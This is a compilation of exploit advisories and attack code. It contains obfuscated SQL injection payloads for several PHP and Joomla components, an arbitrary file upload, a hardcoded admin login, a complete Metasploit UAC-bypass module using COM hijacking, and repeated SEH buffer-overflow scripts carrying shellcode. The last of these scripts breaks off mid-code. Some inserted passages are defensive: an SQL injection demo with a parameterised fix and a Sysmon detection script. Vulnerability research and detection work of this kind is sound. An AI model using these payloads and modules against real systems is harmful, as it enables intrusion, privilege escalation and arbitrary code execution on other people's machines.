# Exploit Title: CMS Web-Gooroo <=1.141 - Multiple Vulnerabilities
# Date: 01-06-2017
# Exploit Author: Kaimi
# Website: https://kaimi.io
# Vendor Homepage: http://web.archive.org/web/20120510194357/http://www.web-gooroo.com/
# Software Link: https://github.com/andrey-buligin/hanna/tree/master/wbg
# Version: <=1.141
# Category: webapps
1. SQL Injection
File: /wbg/core/_includes/authorization.inc.php
Vulnerable code:
$SQL_query = 'SELECT * FROM wbg_users WHERE (login=\'' . $_POST['wbg_login'] . '\') AND (password=\'' . md5(md5($_POST['wbg_password'])) . '\')';
$USER = mysql_fetch_assoc(mysql_query($SQL_query));
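As an added example (not part of the advisory or of the CMS code), the query shape above rebuilt in Python against an in-memory SQLite table. Only wbg_login reaches the SQL raw; the password is hashed first, so the login value is the injection point. The crafted login closes the parenthesised login clause and ORs in a true condition, so the password comparison is never decisive; the parameterised variant shows the fix. The table, the account, the password and the payload are all constructed here; the md5(md5()) scheme is taken from the vulnerable line.

```python
import hashlib
import sqlite3


def double_md5(s: str) -> str:
    """Password storage used by the CMS: md5(md5(password)) as hex."""
    inner = hashlib.md5(s.encode()).hexdigest()
    return hashlib.md5(inner.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for wbg_users with a single admin account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wbg_users (id INTEGER PRIMARY KEY, login TEXT, password TEXT)")
    db.execute("INSERT INTO wbg_users (login, password) VALUES (?, ?)",
               ("admin", double_md5("correct horse battery staple")))
    db.commit()
    return db


def login_vulnerable(db, wbg_login: str, wbg_password: str):
    """Mirrors authorization.inc.php: the login is concatenated into the SQL unescaped."""
    sql = ("SELECT * FROM wbg_users WHERE (login='" + wbg_login + "') "
           "AND (password='" + double_md5(wbg_password) + "')")
    return db.execute(sql).fetchone()


def login_fixed(db, wbg_login: str, wbg_password: str):
    """Hardened form: bound parameters, so the login value cannot change the query."""
    sql = "SELECT * FROM wbg_users WHERE login = ? AND password = ?"
    return db.execute(sql, (wbg_login, double_md5(wbg_password))).fetchone()


# Constructed payload. The query becomes
#   WHERE (login='admin') OR ('1'='1') AND (password='<hash>')
# and AND binds tighter than OR, so the admin row matches whatever the password is.
PAYLOAD = "admin') OR ('1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, wrong password:", login_vulnerable(db, PAYLOAD, "wrong"))
    print("fixed, same input:        ", login_fixed(db, PAYLOAD, "wrong"))
```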
2. Hardcoded admin user
File: /wbg/core/_includes/authorization.inc.php
Vulnerable code:
if ((md5($_POST['wbg_login']) == '2d626704807d4c5be1b46e85c4070fec') && (md5($_POST['wbg_password']) == '2967a371178d713d3898957dd44786af')) {
$USER = $this->get_megaadmin();
}
2d626704807d4c5be1b46e85c4070fec - 'mayhem' (the hardcoded login, recovered)
2967a371178d713d3898957dd44786af - the hardcoded password hash; brute force did not recover it
3. Full path disclosure
Almost any file discloses the installation path, because of the lack of input validation and error handling throughout the code.
The CMS log file (in addition to the DB log) is web-accessible and contains full paths and debug output:
/wbg/tmp/logs/syslog.log.php
4. Unrestricted file upload
Possible from the admin panel by attaching a file to any publication; no file type checking is performed.
# # # # #
# Exploit Title: Login-Reg Members Management PHP 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage : https://www.codester.com/user/mostalo
# Software Link: https://www.codester.com/items/627/login-reg-members-management-php
# Demo: http://0log.890m.com/log/signup.php
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to upload arbitrary files.
#
# Vulnerable Source:
# .....................
# if ($_FILES['profile_pic']['size'] == 0){$rr2 = "no file";}
# if (is_uploaded_file($_FILES["profile_pic"]["tmp_name"])) {
# $filename = time() . '_' . $_FILES["profile_pic"]["name"];
# $filepath = 'profile_pics/' . $filename;
# if (!move_uploaded_file($_FILES["profile_pic"]["tmp_name"], $filepath)) {
# $error = "select img";
# .....................
#
# Proof of Concept:
#
# The user profile picture upload (profile_pic) accepts any file; the original file name is kept, so a .php file is stored and served from profile_pics/.
#
# http://localhost/[PATH]/signup.php
# http://localhost/[PATH]/profile_pics/[ID_FILE].php
#
# Etc...
# # # # #
# # # # #
# Exploit Title: Flash Multiplayer Poker PHP Script 2.0 - SQL Injection
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage: http://www.flashpoker.it/
# Software Link: https://www.codester.com/items/559/flash-poker-v2-multiplayer-poker-php-script
# Demo: http://www.flashpoker.it/index/
# Version: 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands via the parameter shown below.
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?act_value=pkr_www&sub_act_value=pkr_viewgamehistory&game=[SQL]
#
# 1+Or+0x31+gRoUp+bY+ConCAT_WS(0x3a,VeRsiON(),fLoOR(rAnD(0)*2))+hAvING+MIn(0)+OR+0x31
#
# Etc..
# # # # #
# # # # #
# Exploit Title: PHP Search Engine 1.0 - SQL Injection
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Link: https://www.codester.com/items/2975/php-search-engine-mysql-based-simple-site-search
# Demo: http://codester.nelliwinne.net/PHPSearchEngine/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands via the parameters shown below.
#
# Proof of Concept:
#
# http://localhost/[PATH]/go.php?id=[SQL]
# http://localhost/[PATH]/admin-delete.php?id=[SQL]
#
# 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
#
# Etc..
# # # # #
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/exe'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Post::Windows::Priv
  include Post::Windows::Registry
  include Post::Windows::Runas
  include Exploit::FileDropper

  CLSID_PATH = "HKCU\\Software\\Classes\\CLSID"
  DEFAULT_VAL_NAME = '' # This maps to "(Default)"

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)',
      'Description'    => %q{
        This module will bypass Windows UAC by creating COM handler registry entries in the
        HKCU hive. When certain high integrity processes are loaded, these registry entries
        are referenced resulting in the process loading user-controlled DLLs. These DLLs
        contain the payloads that result in elevated sessions. Registry key modifications
        are cleaned up after payload invocation.

        This module requires the architecture of the payload to match the OS, but the
        current low-privilege Meterpreter session architecture can be different. If
        specifying EXE::Custom your DLL should call ExitProcess() after starting your
        payload in a separate process.

        This module invokes the target binary via cmd.exe on the target. Therefore if
        cmd.exe access is restricted, this module will not run correctly.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Matt Nelson', # UAC bypass discovery and research
        'b33f',        # UAC bypass discovery and research
        'OJ Reeves'    # MSF module
      ],
      'Platform'       => ['win'],
      'SessionTypes'   => ['meterpreter'],
      'Targets'        => [
        ['Automatic', {}]
      ],
      'DefaultTarget'  => 0,
      'References'     => [
        ['URL', 'https://www.youtube.com/watch?v=3gz1QmiHhss'],
        ['URL', 'https://wikileaks.org/ciav7p1/cms/page_13763373.html'],
        ['URL', 'https://github.com/FuzzySecurity/Defcon25/Defcon25_UAC-0day-All-Day_v1.2.pdf']
      ],
      'DisclosureDate' => 'Jan 01 1900'
    ))
  end

  def check
    if sysinfo['OS'] =~ /Windows (7|8|10|2008|2012|2016)/ && is_uac_enabled?
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    # Make sure we have a sane payload configuration
    if sysinfo['Architecture'] != payload_instance.arch.first
      fail_with(Failure::BadConfig, "#{payload_instance.arch.first} payload selected for #{sysinfo['Architecture']} system")
    end

    registry_view = REGISTRY_VIEW_NATIVE
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
      registry_view = REGISTRY_VIEW_64_BIT
    end

    # Validate that we can actually do things before we bother
    # doing any more work
    check_permissions!

    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
         UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
         UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable,
        "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."
      )
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    payload = generate_payload_dll({:dll_exitprocess => true})
    commspec = expand_path('%COMSPEC%')
    dll_name = expand_path("%TEMP%\\#{rand_text_alpha(8)}.dll")

    hijack = hijack_com(registry_view, dll_name)
    unless hijack && hijack[:cmd_path]
      fail_with(Failure::Unknown, 'Unable to hijack COM')
    end

    begin
      print_status("Targeting #{hijack[:name]} via #{hijack[:root_key]} ...")
      print_status("Uploading payload to #{dll_name} ...")
      write_file(dll_name, payload)
      register_file_for_cleanup(dll_name)

      print_status("Executing high integrity process ...")
      args = "/c #{expand_path(hijack[:cmd_path])}"
      args << " #{hijack[:cmd_args]}" if hijack[:cmd_args]

      # Launch the application from cmd.exe instead of directly so that we can
      # avoid the dreaded 740 error (elevation required)
      client.sys.process.execute(commspec, args, {'Hidden' => true})

      # Wait a couple of seconds to give the payload a chance to fire before cleaning up
      Rex::sleep(5)
      handler(client)
    ensure
      print_status("Cleaning up registry ...")
      registry_deletekey(hijack[:root_key], registry_view)
    end
  end

  # TODO: Add more hijack points when they're known.
  # TODO: when more class IDs are found for individual hijack points
  #       they can be added to the array of class IDs.
  @@hijack_points = [
    {
      name: 'Event Viewer',
      cmd_path: '%WINDIR%\System32\eventvwr.exe',
      class_ids: ['0A29FF9E-7F9C-4437-8B11-F424491E3931']
    },
    {
      name: 'Computer Management',
      cmd_path: '%WINDIR%\System32\mmc.exe',
      cmd_args: 'CompMgmt.msc',
      class_ids: ['0A29FF9E-7F9C-4437-8B11-F424491E3931']
    }
  ]

  #
  # Perform the hijacking of COM class IDs. This function chooses a random
  # application target and a random class id associated with it before
  # modifying the registry.
  #
  def hijack_com(registry_view, dll_path)
    target = @@hijack_points.sample
    target_clsid = target[:class_ids].sample

    root_key = "#{CLSID_PATH}\\{#{target_clsid}}"
    inproc_key = "#{root_key}\\InProcServer32"
    shell_key = "#{root_key}\\ShellFolder"

    registry_createkey(root_key, registry_view)
    registry_createkey(inproc_key, registry_view)
    registry_createkey(shell_key, registry_view)

    registry_setvaldata(inproc_key, DEFAULT_VAL_NAME, dll_path, 'REG_SZ', registry_view)
    registry_setvaldata(inproc_key, 'ThreadingModel', 'Apartment', 'REG_SZ', registry_view)
    registry_setvaldata(inproc_key, 'LoadWithoutCOM', '', 'REG_SZ', registry_view)
    registry_setvaldata(shell_key, 'HideOnDesktop', '', 'REG_SZ', registry_view)
    registry_setvaldata(shell_key, 'Attributes', 0xf090013d, 'REG_DWORD', registry_view)

    {
      name: target[:name],
      cmd_path: target[:cmd_path],
      cmd_args: target[:cmd_args],
      root_key: root_key
    }
  end

  def check_permissions!
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

    # Check if you are an admin. A nil result means whoami could not be run;
    # that case is reported below rather than treated as "not an admin".
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?

    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end

    print_status('UAC is Enabled, checking level...')

    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    elsif admin_group
      print_good('Part of Administrators group! Continuing...')
    else
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end
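The module's footprint is a handful of per-user registry writes: a CLSID key under HKCU\Software\Classes\CLSID with an InProcServer32 default value pointing at a DLL in %TEMP%. As an added example (not part of the Metasploit module), the Python below scans Sysmon-style registry events (Event ID 12 key created, 13 value set) and flags exactly that pattern, rating it higher when the class ID is the one the module's hijack points use. The pipe-delimited line format and every sample line are constructed for the example; the key names and the CLSID come from the module above. Sysmon reports HKCU paths as HKU\<SID>\..., which the matcher relies on.

```python
import re

# Class ID the module's hijack points use (Event Viewer and Computer Management
# both resolve it); add further CLSIDs here as new hijack points are published.
KNOWN_UAC_CLSIDS = {"0A29FF9E-7F9C-4437-8B11-F424491E3931"}

# Per-user COM server registration: Sysmon logs HKCU paths as HKU\<SID>\...
HKCU_INPROC = re.compile(
    r"^HKU\\[^\\]+\\Software\\Classes\\CLSID\\\{([0-9A-Fa-f-]{36})\}\\InProcServer32(\\.*)?$",
    re.IGNORECASE,
)


def parse_event(line: str) -> dict:
    """Parse one constructed 'Field=value|Field=value' registry event line."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def classify(ev: dict):
    """Return (severity, reason) for a suspicious event, or None."""
    target = ev.get("TargetObject", "")
    match = HKCU_INPROC.match(target)
    if not match:
        return None  # HKLM registrations and unrelated keys are out of scope
    clsid = match.group(1).upper()
    image = ev.get("Image", "?")
    # Event 13 (value set) on InProcServer32\(Default): the DLL COM will load
    # into the next high-integrity process that instantiates this class.
    if ev.get("EventID") == "13" and target.lower().endswith("inprocserver32\\(default)"):
        dll = ev.get("Details", "")
        if dll.lower().endswith(".dll"):
            severity = "high" if clsid in KNOWN_UAC_CLSIDS else "medium"
            return severity, f"HKCU InProcServer32 for {{{clsid}}} set to {dll} by {image}"
    # Event 12 (key created) for a known auto-elevating class under HKCU.
    if ev.get("EventID") == "12" and clsid in KNOWN_UAC_CLSIDS:
        return "medium", f"HKCU CLSID key created for known UAC-bypass class {{{clsid}}} by {image}"
    return None


def scan(lines):
    """Run classify() over event lines and collect the alerts in order."""
    return [hit for hit in (classify(parse_event(line)) for line in lines) if hit]


# Constructed sample events, not real telemetry. Lines 2 and 3 reproduce the
# module's writes; line 4 is the ThreadingModel value; line 5 is an ordinary
# machine-wide registration under HKLM and must not fire.
SAMPLE_EVENTS = [
    "EventID=12|Image=C:\\Windows\\explorer.exe|TargetObject=HKU\\S-1-5-21-1-2-3-1001\\Software\\Classes\\ms-settings",
    "EventID=12|Image=C:\\Users\\u\\AppData\\Local\\Temp\\x.exe|TargetObject=HKU\\S-1-5-21-1-2-3-1001\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\InProcServer32",
    "EventID=13|Image=C:\\Users\\u\\AppData\\Local\\Temp\\x.exe|TargetObject=HKU\\S-1-5-21-1-2-3-1001\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\InProcServer32\\(Default)|Details=C:\\Users\\u\\AppData\\Local\\Temp\\AbCdEfGh.dll",
    "EventID=13|Image=C:\\Users\\u\\AppData\\Local\\Temp\\x.exe|TargetObject=HKU\\S-1-5-21-1-2-3-1001\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\InProcServer32\\ThreadingModel|Details=Apartment",
    "EventID=13|Image=C:\\Program Files\\Vendor\\setup.exe|TargetObject=HKLM\\SOFTWARE\\Classes\\CLSID\\{11111111-2222-3333-4444-555555555555}\\InProcServer32\\(Default)|Details=C:\\Program Files\\Vendor\\v.dll",
]

if __name__ == "__main__":
    for severity, reason in scan(SAMPLE_EVENTS):
        print(severity.upper(), reason)
```

Because the module deletes the key in its ensure block, a query of the live registry after the fact usually finds nothing; the event stream is what keeps the evidence, and the short-lived HKCU\...\CLSID\{...}\InProcServer32 write followed by eventvwr.exe or mmc.exe starting is the sequence to alert on.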
# # # # #
# Exploit Title: Joomla! Component Sponsor Wall 8.0 - SQL Injection
# Dork: N/A
# Date: 21.08.2017
# Vendor Homepage: http://pulseextensions.com/
# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/sponsor-wall/
# Demo: http://demo.pulseextensions.com/sponsor-wall-component-demo/
# Version: 8.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands via the parameter shown below.
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?option=com_sponsorwall&task=click&wallid=[SQL]
#
# 86+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
#
# Etc..
# # # # #
Sources:
https://github.com/doadam/ziVA
https://blog.zimperium.com/ziva-video-audio-ios-kernel-exploit/
ziVA
An iOS kernel exploit designed to work on all 64-bit iOS devices <= 10.3.1
More general information
https://blog.zimperium.com/zimperium-zlabs-ios-security-advisories/
https://blog.zimperium.com/ziva-video-audio-ios-kernel-exploit/
Offsets modifications for other iOS devices
Like a lot (if not most) of the iOS kernel exploits, this one also requires offsets for each iOS device and version. Those will be posted in the near future (when I get more time) but can be acquired from AppleAVEDriver (the comments above the offsets give a hint on how to find them).
Sandbox escape
As mentioned, direct access to AppleAVEDriver requires a sandbox escape (either the mediaserverd sandbox context or no sandbox at all). Fortunately, sandbox escape exploits have been released by P0, which means this can be used to completely compromise the kernel, and is a step towards a full jailbreak.
Is it a Jailbreak?
This is a crucial part of a jailbreak chain, but it was never aimed at becoming a jailbreak on its own.
Is this going to be a jailbreak?
Maybe, if someone wants to work on that.
Credits
Credit for finding the vulnerabilities, chaining them together and writing the exploit goes to Adam Donenfeld (@doadam). Special thanks to Zuk Avraham (@ihackbanme), Yaniv Karta (@shokoluv) and the rest of the Zimperium team for the opportunity (and the paycheck).
Proof of Concept:
https://github.com/doadam/ziVA
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42555.zip
# # # # #
# Exploit Title: Joomla! Component Bargain Product VM3 1.0 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://www.weborange.eu/
# Software Link: https://www.weborange.eu/extensions/index.php/extensions-vm3/bargain-product-vm3-detail
# Demo: http://www.weborange.eu/demo/index.php/bargain-product
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands via the parameter shown below.
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=brainy&product_id=[SQL]
# http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=alice&product_id=[SQL]
#
# 17+OR+0x3231323232+/*!00005Group*/+BY+/*!00005ConcAT_WS*/(0x3a,0x496873616e2053656e63616e,VersioN(),FLooR(RaND(0)*0x32))+/*!00005havinG*/+min(0)+OR+0x31
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Joomla! Component Price Alert 3.0.2 - SQL Injection
# Dork: N/A
# Date: 25.08.2017
# Vendor Homepage: https://www.weborange.eu/
# Software Link: https://extensions.joomla.org/extensions/extension/extension-specific/virtuemart-extensions/price-alert/
# Demo: https://www.weborange.eu/extensions/index.php/extensions-vm3/price-alert-detail
# Version: 3.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject SQL commands via the parameter shown below.
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?option=com_price_alert&view=subscribeajax&task=pricealert_ajax&product_id=[SQL]
#
# 64+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
#
# Etc..
# # # # #
#!/usr/bin/env python3
###############################################################################
# Exploit Title: MP3 WAV to CD Burner 1.4.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 24-08-2017
# Exploit Author: Anurag Srivastava
# Website: www.pyramidcyber.com
# Vulnerable Software: MP3 WAV to CD Burner
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.4.24
# Software Link: http://www.divxtodvd.net/mp3_cd_burner.exe
# Tested On: Windows 7 x64
# All the vendor's softwares below are affected to this bug which all can be found in http://www.divxtodvd.net/ till date 24-08-2017 .
# Easy MPEG/AVI/DIVX/WMV/RM to DVD
# Easy Avi/Divx/Xvid to DVD Burner
# Easy MPEG to DVD Burner
# Easy WMV/ASF/ASX to DVD Burner
# Easy RM RMVB to DVD Burner
# Easy CD DVD Copy
# MP3/AVI/MPEG/WMV/RM to Audio CD Burner
# MP3/WAV/OGG/WMA/AC3 to CD Burner
# Easy MOV Converter
# Easy Video to iPod Converter
# Easy Video to PSP Converter
# Easy Video to 3GP Converter
# Easy Video to MP4 Converter
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
# 1008 bytes of filler reach the SEH record (nSEH, then the handler pointer).
buffer = b"\x41" * 1008
# nSEH: short jump (EB 10) over the handler address into the NOP sled below.
nSEH = b"\xeb\x10\x90\x90"
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = b"\x59\x78\x03\x10"
badchars = b"\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = b""
buf += b"\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += b"\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += b"\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += b"\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += b"\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += b"\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += b"\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += b"\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += b"\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += b"\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += b"\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += b"\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += b"\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += b"\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += b"\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += b"\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += b"\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nops = b"\x90" * 16
data = buffer + nSEH + SEH + nops + buf
# Written as raw bytes so the shellcode is not re-encoded on the way to disk.
with open("pyramid.txt", "wb") as f:
    f.write(data)
#!/usr/bin/env python3
###############################################################################
# Exploit Title: My Video Converter 1.5.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 24-08-2017
# Exploit Author: Anurag Srivastava
# Website: www.pyramidcyber.com
# Vulnerable Software: My Video Converter 1.5.24
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.5.24
# Software Link: http://www.divxtodvd.net/my_video_converter.exe
# Tested On: Windows 7 x64
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
# 1008 bytes of filler reach the SEH record (nSEH, then the handler pointer).
buffer = b"\x41" * 1008
# nSEH: short jump (EB 10) over the handler address into the NOP sled below.
nSEH = b"\xeb\x10\x90\x90"
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = b"\x59\x78\x03\x10"
badchars = b"\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = b""
buf += b"\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
buf += b"\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
buf += b"\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
buf += b"\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
buf += b"\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
buf += b"\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
buf += b"\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
buf += b"\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
buf += b"\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
buf += b"\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
buf += b"\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
buf += b"\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
buf += b"\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
buf += b"\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
buf += b"\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
buf += b"\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
buf += b"\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
nops = b"\x90" * 16
data = buffer + nSEH + SEH + nops + buf
# Written as raw bytes so the shellcode is not re-encoded on the way to disk.
with open("pyramid.txt", "wb") as f:
    f.write(data)
#!/usr/bin/env python3
###############################################################################
# Exploit Title: Easy AVI DivX Converter 1.2.24 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date: 24-08-2017
# Exploit Author: Anurag Srivastava
# Website: www.pyramidcyber.com
# Vulnerable Software: Easy AVI DivX Converter
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.2.24
# Software Link: http://www.divxtodvd.net/easy_avi_converter.exe
# Tested On: Windows 7 x64
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of pyramid.txt
#
##############################################################################
# 1008 bytes of filler reach the SEH record (nSEH, then the handler pointer).
buffer = b"\x41" * 1008
# nSEH: short jump (EB 10) over the handler address into the NOP sled below.
nSEH = b"\xeb\x10\x90\x90"
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH = b"\x59\x78\x03\x10"
badchars = b"\x00\x0a\x0d" # and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
buf = b""
